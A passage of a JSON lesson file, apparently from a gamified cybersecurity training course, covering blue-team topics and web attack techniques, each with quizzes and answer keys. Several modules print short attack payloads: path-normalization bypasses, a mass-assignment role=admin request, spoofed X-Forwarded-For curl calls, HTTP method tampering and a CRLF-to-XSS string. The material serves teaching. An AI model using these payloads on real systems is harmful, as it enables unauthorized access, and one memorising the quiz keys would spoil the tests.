behavior"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention matters because...","opts":["Space","Needed for incident investigation","Slow systems","Contain passwords"],"ans":1},{"type":"quiz","q":"Threat modeling identifies...","opts":["Network speed","Potential threats during design","Encryption strength","User satisfaction"],"ans":1},{"type":"quiz","q":"DMZ is...","opts":["Encryption","Zone between internal and external networks","User group","Firewall brand"],"ans":1},{"type":"quiz","q":"SOC stands for...","opts":["Security Operations Center","System Output","Secure Online","Standard Operating"],"ans":0},{"type":"quiz","q":"NIST 800-53 provides...","opts":["Algorithms","Security controls catalog","Diagrams","Passwords only"],"ans":1},{"type":"quiz","q":"XDR extends EDR by...","opts":["More endpoints","Correlating across endpoints, network, cloud","Speed","Cost"],"ans":1},{"type":"quiz","q":"Security baseline is...","opts":["Attack start","Minimum security configuration","Firewall","Encryption key"],"ans":1},{"type":"quiz","q":"Playbook defines...","opts":["Game strategy","Pre-defined response steps for incidents","Log file","Firewall rule"],"ans":1},{"type":"quiz","q":"SOAR automates...","opts":["Attacks","Repetitive SOC tasks","Encryption","Development"],"ans":1},{"type":"quiz","q":"Sigma rules convert to...","opts":["Only Splunk","Any SIEM query language","Only Elastic","Only KQL"],"ans":1},{"type":"quiz","q":"False positive means...","opts":["Real attack detected","Normal traffic flagged as attack","Attack missed","IDS crashed"],"ans":1},{"type":"quiz","q":"Defense in depth means...","opts":["One firewall","Multiple overlapping security layers","Deep inspection","Encrypt everything"],"ans":1},{"type":"quiz","q":"Incident classification P1 means...","opts":["Low","Critical active breach","Medium","Info"],"ans":1},{"type":"quiz","q":"3-2-1 backup rule is...","opts":["3 servers","3 copies, 2 media, 1 offsite","3 keys","3 passwords"],"ans":1}]},{"id":"df-container-security-ops","cat":"Defense & Blue Team","title":"Container Security Operations","diff":3,"xp":200,"intro":"Secure the container lifecycle: build, deploy, and runtime.","sections":[{"type":"text","content":"Container security: scan images in CI/CD (trivy), enforce pod security policies, use read-only filesystems, drop capabilities, and monitor runtime behavior."},{"type":"code","lang":"bash","content":"# CI/CD: scan before push\ntrivy image myapp:latest --severity CRITICAL,HIGH\n# Registry: enable vulnerability scanning\n# Runtime: Falco for behavioral monitoring\nfalco -r /etc/falco/falco_rules.yaml\n# Policy: OPA/Gatekeeper for admission control"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Container security should cover...","opts":["Only runtime","Build, deploy, AND runtime (the full lifecycle)","Only images","Only networking"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention matters because...","opts":["Space","Needed for incident investigation","Slow systems","Contain passwords"],"ans":1},{"type":"quiz","q":"Threat modeling identifies...","opts":["Network speed","Potential threats during design","Encryption strength","User satisfaction"],"ans":1},{"type":"quiz","q":"DMZ is...","opts":["Encryption","Zone between internal and external networks","User group","Firewall brand"],"ans":1},{"type":"quiz","q":"SOC stands for...","opts":["Security Operations Center","System Output","Secure Online","Standard Operating"],"ans":0},{"type":"quiz","q":"NIST 800-53 provides...","opts":["Algorithms","Security controls catalog","Diagrams","Passwords only"],"ans":1},{"type":"quiz","q":"XDR extends EDR by...","opts":["More endpoints","Correlating across endpoints, network, cloud","Speed","Cost"],"ans":1},{"type":"quiz","q":"Security baseline is...","opts":["Attack start","Minimum security configuration","Firewall","Encryption key"],"ans":1},{"type":"quiz","q":"Playbook defines...","opts":["Game strategy","Pre-defined response steps for incidents","Log file","Firewall rule"],"ans":1},{"type":"quiz","q":"SOAR automates...","opts":["Attacks","Repetitive SOC tasks","Encryption","Development"],"ans":1},{"type":"quiz","q":"Sigma rules convert to...","opts":["Only Splunk","Any SIEM query language","Only Elastic","Only KQL"],"ans":1},{"type":"quiz","q":"False positive means...","opts":["Real attack detected","Normal traffic flagged as attack","Attack missed","IDS crashed"],"ans":1},{"type":"quiz","q":"Defense in depth means...","opts":["One firewall","Multiple overlapping security layers","Deep inspection","Encrypt everything"],"ans":1},{"type":"quiz","q":"Incident classification P1 means...","opts":["Low","Critical active breach","Medium","Info"],"ans":1},{"type":"quiz","q":"3-2-1 backup rule is...","opts":["3 servers","3 copies, 2 media, 1 offsite","3 keys","3 passwords"],"ans":1}]},{"id":"df-data-loss","cat":"Defense & Blue Team","title":"Data Loss Prevention (DLP)","diff":2,"xp":150,"intro":"Detect and prevent sensitive data from leaving the organization.","sections":[{"type":"text","content":"DLP: monitor email for credit card numbers, SSNs, and classified terms. Block USB transfers of sensitive files. Inspect HTTPS traffic via proxy."},{"type":"code","lang":"bash","content":"# DLP checks:\n# Email: regex for credit cards, SSNs, keywords\n# Endpoint: block USB copy of sensitive files\n# Network: HTTPS inspection proxy\n# Cloud: CASB for SaaS data monitoring\n# Regex for credit card: \\b[0-9]{4}[- ]?[0-9]{4}[- ]?[0-9]{4}[- ]?[0-9]{4}\\b"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"DLP monitors for...","opts":["Malware","Sensitive data (PII, financial, classified) leaving the organization","Performance issues","Authentication"],"ans":1},{"type":"quiz","q":"HTTP default port is...","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"robots.txt reveals...","opts":["Passwords","Directories hidden from crawlers","Vulnerabilities","Keys"],"ans":1},{"type":"quiz","q":"HTTPS uses...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"A WAF is a...","opts":["Network firewall","Web Application Firewall","Wireless tool","VPN"],"ans":1},{"type":"quiz","q":"SameSite cookie prevents...","opts":["XSS","CSRF","SQLi","Clickjacking"],"ans":1},{"type":"quiz","q":"OPTIONS method reveals...","opts":["Secrets","Allowed HTTP methods","User data","Schema"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP?","opts":["nmap","Burp Suite","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"Secure cookie flags include...","opts":["Secure, HttpOnly, SameSite","Public, Readable","Debug, Verbose","None"],"ans":0},{"type":"quiz","q":"URL encoding converts...","opts":["HTML to text","Special chars to %XX","Images to text","Binary to hex"],"ans":1},{"type":"quiz","q":"HTTP 302 means...","opts":["OK","Not found","Temporary redirect","Server error"],"ans":2},{"type":"quiz","q":"DOM stands for...","opts":["Data Object Model","Document Object Model","Direct Output Method","Dynamic Mode"],"ans":1},{"type":"quiz","q":"Content-Type header specifies...","opts":["Authentication","The format of the request/response body","Cache settings","Encoding"],"ans":1},{"type":"quiz","q":"What does URL encoding of ' produce?","opts":["%27","%22","%3C","%3E"],"ans":0},{"type":"quiz","q":"X-Frame-Options prevents...","opts":["XSS","Clickjacking (iframe embedding)","SQLi","CSRF"],"ans":1},{"type":"quiz","q":"Input validation should happen...","opts":["Client only","Server only","Both client and server","Neither"],"ans":2},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1}]},{"id":"wa-path-norm","cat":"Web Application","title":"Path Normalization Bypass","diff":3,"xp":200,"intro":"Bypass access controls using path normalization differences.","sections":[{"type":"text","content":"Different components normalize paths differently: /admin/../admin, /./admin, /admin%2f, //admin \u2014 reverse proxies vs backends may disagree on the final path."},{"type":"code","lang":"bash","content":"# Bypass path-based access controls:\n/admin -> 403\n/Admin -> 200 (case sensitivity)\n/admin/ -> 200 (trailing slash)\n/admin/. -> 200 (dot)\n/.;/admin -> 200 (Spring semicolon)\n/admin%00 -> 200 (null byte)"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Path normalization bypass exploits...","opts":["SQL injection","Different path parsing between reverse proxy and backend","XSS","CSRF"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"HTTP default port is...","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"robots.txt reveals...","opts":["Passwords","Directories hidden from crawlers","Vulnerabilities","Keys"],"ans":1},{"type":"quiz","q":"HTTPS uses...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"A WAF is a...","opts":["Network firewall","Web Application Firewall","Wireless tool","VPN"],"ans":1},{"type":"quiz","q":"SameSite cookie prevents...","opts":["XSS","CSRF","SQLi","Clickjacking"],"ans":1},{"type":"quiz","q":"OPTIONS method reveals...","opts":["Secrets","Allowed HTTP methods","User data","Schema"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP?","opts":["nmap","Burp Suite","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"Secure cookie flags include...","opts":["Secure, HttpOnly, SameSite","Public, Readable","Debug, Verbose","None"],"ans":0},{"type":"quiz","q":"URL encoding converts...","opts":["HTML to text","Special chars to %XX","Images to text","Binary to hex"],"ans":1},{"type":"quiz","q":"HTTP 302 means...","opts":["OK","Not found","Temporary redirect","Server error"],"ans":2},{"type":"quiz","q":"DOM stands for...","opts":["Data Object Model","Document Object Model","Direct Output Method","Dynamic Mode"],"ans":1},{"type":"quiz","q":"Content-Type header specifies...","opts":["Authentication","The format of the request/response body","Cache settings","Encoding"],"ans":1},{"type":"quiz","q":"What does URL encoding of ' produce?","opts":["%27","%22","%3C","%3E"],"ans":0},{"type":"quiz","q":"X-Frame-Options prevents...","opts":["XSS","Clickjacking (iframe embedding)","SQLi","CSRF"],"ans":1},{"type":"quiz","q":"Input validation should happen...","opts":["Client only","Server only","Both client and server","Neither"],"ans":2},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1}]},{"id":"wa-mass-assignment","cat":"Web Application","title":"Mass Assignment Vulnerability","diff":2,"xp":150,"intro":"Update fields you shouldn't have access to by adding extra parameters.","sections":[{"type":"text","content":"If the API binds all request parameters to the model, adding role=admin or isVerified=true to a profile update request may work."},{"type":"code","lang":"bash","content":"# Normal profile update:\nPUT /api/profile\n{\"name\":\"Hacker\",\"email\":\"h@h.com\"}\n# Mass assignment attack:\nPUT /api/profile\n{\"name\":\"Hacker\",\"email\":\"h@h.com\",\"role\":\"admin\",\"isVerified\":true}"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Mass assignment works because the API...","opts":["Validates all fields","Binds all request parameters to the model without filtering","Requires admin","Uses encryption"],"ans":1},{"type":"quiz","q":"HTTP default port is...","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"robots.txt reveals...","opts":["Passwords","Directories hidden from crawlers","Vulnerabilities","Keys"],"ans":1},{"type":"quiz","q":"HTTPS uses...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"A WAF is a...","opts":["Network firewall","Web Application Firewall","Wireless tool","VPN"],"ans":1},{"type":"quiz","q":"SameSite cookie prevents...","opts":["XSS","CSRF","SQLi","Clickjacking"],"ans":1},{"type":"quiz","q":"OPTIONS method reveals...","opts":["Secrets","Allowed HTTP methods","User data","Schema"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP?","opts":["nmap","Burp Suite","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"Secure cookie flags include...","opts":["Secure, HttpOnly, SameSite","Public, Readable","Debug, Verbose","None"],"ans":0},{"type":"quiz","q":"URL encoding converts...","opts":["HTML to text","Special chars to %XX","Images to text","Binary to hex"],"ans":1},{"type":"quiz","q":"HTTP 302 means...","opts":["OK","Not found","Temporary redirect","Server error"],"ans":2},{"type":"quiz","q":"DOM stands for...","opts":["Data Object Model","Document Object Model","Direct Output Method","Dynamic Mode"],"ans":1},{"type":"quiz","q":"Content-Type header specifies...","opts":["Authentication","The format of the request/response body","Cache settings","Encoding"],"ans":1},{"type":"quiz","q":"What does URL encoding of ' produce?","opts":["%27","%22","%3C","%3E"],"ans":0},{"type":"quiz","q":"X-Frame-Options prevents...","opts":["XSS","Clickjacking (iframe embedding)","SQLi","CSRF"],"ans":1},{"type":"quiz","q":"Input validation should happen...","opts":["Client only","Server only","Both client and server","Neither"],"ans":2},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1}]},{"id":"wa-header-auth-bypass","cat":"Web Application","title":"Authentication Bypass via Headers","diff":2,"xp":150,"intro":"Bypass authentication using trusted proxy headers.","sections":[{"type":"text","content":"If the app trusts X-Forwarded-For, X-Real-IP, or custom headers for authentication (e.g., internal network detection), inject them to bypass auth."},{"type":"code","lang":"bash","content":"# Bypass IP-based restrictions\ncurl -H 'X-Forwarded-For: 127.0.0.1' https://target.com/admin\ncurl -H 'X-Real-IP: 10.0.0.1' https://target.com/internal\ncurl -H 'X-Originating-IP: 127.0.0.1' https://target.com/admin\ncurl -H 'X-Custom-IP-Authorization: 127.0.0.1' https://target.com/admin"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"X-Forwarded-For bypass works when the app...","opts":["Validates the header","Trusts the header for IP-based access decisions","Ignores headers","Encrypts headers"],"ans":1},{"type":"quiz","q":"HTTP default port is...","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"robots.txt reveals...","opts":["Passwords","Directories hidden from crawlers","Vulnerabilities","Keys"],"ans":1},{"type":"quiz","q":"HTTPS uses...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"A WAF is a...","opts":["Network firewall","Web Application Firewall","Wireless tool","VPN"],"ans":1},{"type":"quiz","q":"SameSite cookie prevents...","opts":["XSS","CSRF","SQLi","Clickjacking"],"ans":1},{"type":"quiz","q":"OPTIONS method reveals...","opts":["Secrets","Allowed HTTP methods","User data","Schema"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP?","opts":["nmap","Burp Suite","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"Secure cookie flags include...","opts":["Secure, HttpOnly, SameSite","Public, Readable","Debug, Verbose","None"],"ans":0},{"type":"quiz","q":"URL encoding converts...","opts":["HTML to text","Special chars to %XX","Images to text","Binary to hex"],"ans":1},{"type":"quiz","q":"HTTP 302 means...","opts":["OK","Not found","Temporary redirect","Server error"],"ans":2},{"type":"quiz","q":"DOM stands for...","opts":["Data Object Model","Document Object Model","Direct Output Method","Dynamic Mode"],"ans":1},{"type":"quiz","q":"Content-Type header specifies...","opts":["Authentication","The format of the request/response body","Cache settings","Encoding"],"ans":1},{"type":"quiz","q":"What does URL encoding of ' produce?","opts":["%27","%22","%3C","%3E"],"ans":0},{"type":"quiz","q":"X-Frame-Options prevents...","opts":["XSS","Clickjacking (iframe embedding)","SQLi","CSRF"],"ans":1},{"type":"quiz","q":"Input validation should happen...","opts":["Client only","Server only","Both client and server","Neither"],"ans":2},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1}]},{"id":"wa-http-methods","cat":"Web Application","title":"HTTP Method Tampering","diff":1,"xp":75,"intro":"Change the HTTP method to bypass access controls.","sections":[{"type":"text","content":"Some apps only check authorization on POST but allow the same action via PUT, PATCH, or even GET. Try all methods on protected endpoints."},{"type":"code","lang":"bash","content":"# Endpoint blocks POST:\ncurl -X POST https://target.com/admin/delete -d 'id=1'  # 403\n# Try other methods:\ncurl -X PUT https://target.com/admin/delete -d 'id=1'   # 200?\ncurl -X PATCH https://target.com/admin/delete -d 'id=1' # 200?\ncurl -X DELETE https://target.com/admin/delete          # 200?"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"HTTP method tampering works when authorization checks...","opts":["All methods","Only specific methods (e.g., POST but not PUT)","No methods","The content type"],"ans":1},{"type":"quiz","q":"HTTP default port is...","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"robots.txt reveals...","opts":["Passwords","Directories hidden from crawlers","Vulnerabilities","Keys"],"ans":1},{"type":"quiz","q":"HTTPS uses...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"A WAF is a...","opts":["Network firewall","Web Application Firewall","Wireless tool","VPN"],"ans":1},{"type":"quiz","q":"SameSite cookie prevents...","opts":["XSS","CSRF","SQLi","Clickjacking"],"ans":1},{"type":"quiz","q":"OPTIONS method reveals...","opts":["Secrets","Allowed HTTP methods","User data","Schema"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP?","opts":["nmap","Burp Suite","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"Secure cookie flags include...","opts":["Secure, HttpOnly, SameSite","Public, Readable","Debug, Verbose","None"],"ans":0},{"type":"quiz","q":"URL encoding converts...","opts":["HTML to text","Special chars to %XX","Images to text","Binary to hex"],"ans":1},{"type":"quiz","q":"HTTP 302 means...","opts":["OK","Not found","Temporary redirect","Server error"],"ans":2},{"type":"quiz","q":"DOM stands for...","opts":["Data Object Model","Document Object Model","Direct Output Method","Dynamic Mode"],"ans":1},{"type":"quiz","q":"Content-Type header specifies...","opts":["Authentication","The format of the request/response body","Cache settings","Encoding"],"ans":1},{"type":"quiz","q":"What does URL encoding of ' produce?","opts":["%27","%22","%3C","%3E"],"ans":0},{"type":"quiz","q":"X-Frame-Options prevents...","opts":["XSS","Clickjacking (iframe embedding)","SQLi","CSRF"],"ans":1},{"type":"quiz","q":"Input validation should happen...","opts":["Client only","Server only","Both client and server","Neither"],"ans":2},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1}]},{"id":"wa-crlf-injection","cat":"Web Application","title":"CRLF Injection to XSS","diff":3,"xp":200,"intro":"Inject headers via CRLF that lead to cross-site scripting.","sections":[{"type":"text","content":"If CRLF injection allows injecting response headers, inject a Content-Type change and a response body containing JavaScript."},{"type":"code","lang":"bash","content":"# CRLF to XSS:\n?param=value%0d%0aContent-Type:text/html%0d%0a%0d%0a<script>alert(1)</script>\n# Response becomes:\n# HTTP/1.1 200 OK\n# Content-Type: text/html\n#\n# <script>alert(1)</script>"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"CRLF injection leads to XSS by...","opts":["Modifying the database","Injecting a new response body with script content","Changing cookies","Redirecting DNS"],"ans":1},{"type":"quiz","q":"HTTP default port is...","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"robots.txt reveals...","opts":["Passwords","Directories hidden from crawlers","Vulnerabilities","Keys"],"ans":1},{"type":"quiz","q":"HTTPS uses...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"A WAF is a...","opts":["Network firewall","Web Application Firewall","Wireless tool","VPN"],"ans":1},{"type":"quiz","q":"SameSite cookie prevents...","opts":["XSS","CSRF","SQLi","Clickjacking"],"ans":1},{"type":"quiz","q":"OPTIONS method reveals...","opts":["Secrets","Allowed HTTP methods","User data","Schema"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP?","opts":["nmap","Burp Suite","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"Secure cookie flags include...","opts":["Secure, HttpOnly, SameSite","Public, Readable","Debug, Verbose","None"],"ans":0},{"type":"quiz","q":"URL encoding converts...","opts":["HTML to text","Special chars to %XX","Images to text","Binary to hex"],"ans":1},{"type":"quiz","q":"HTTP 302 means...","opts":["OK","Not found","Temporary redirect","Server error"],"ans":2},{"type":"quiz","q":"DOM stands for...","opts":["Data Object Model","Document Object Model","Direct Output Method","Dynamic Mode"],"ans":1},{"type":"quiz","q":"Content-Type header specifies...","opts":["Authentication","The format of the request/response body","Cache settings","Encoding"],"ans":1},{"type":"quiz","q":"What does URL encoding of ' produce?","opts":["%27","%22","%3C","%3E"],"ans":0},{"type":"quiz","q":"X-Frame-Options prevents...","opts":["XSS","Clickjacking (iframe embedding)","SQLi","CSRF"],"ans":1},{"type":"quiz","q":"Input validation should happen...","opts":["Client only","Server only","Both client and server","Neither"],"ans":2},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1}]},{"id":"wa-verb-tampering","cat":"Web Application","title":"HTTP Verb Tampering for Auth Bypass","diff":2,"xp":150,"intro":"Security filters often only check GET and POST \u2014 try HEAD, OPTIONS, TRACE.","sections":[{"type":"text","content":"Web servers may process HEAD requests identically to GET but skip security filters that 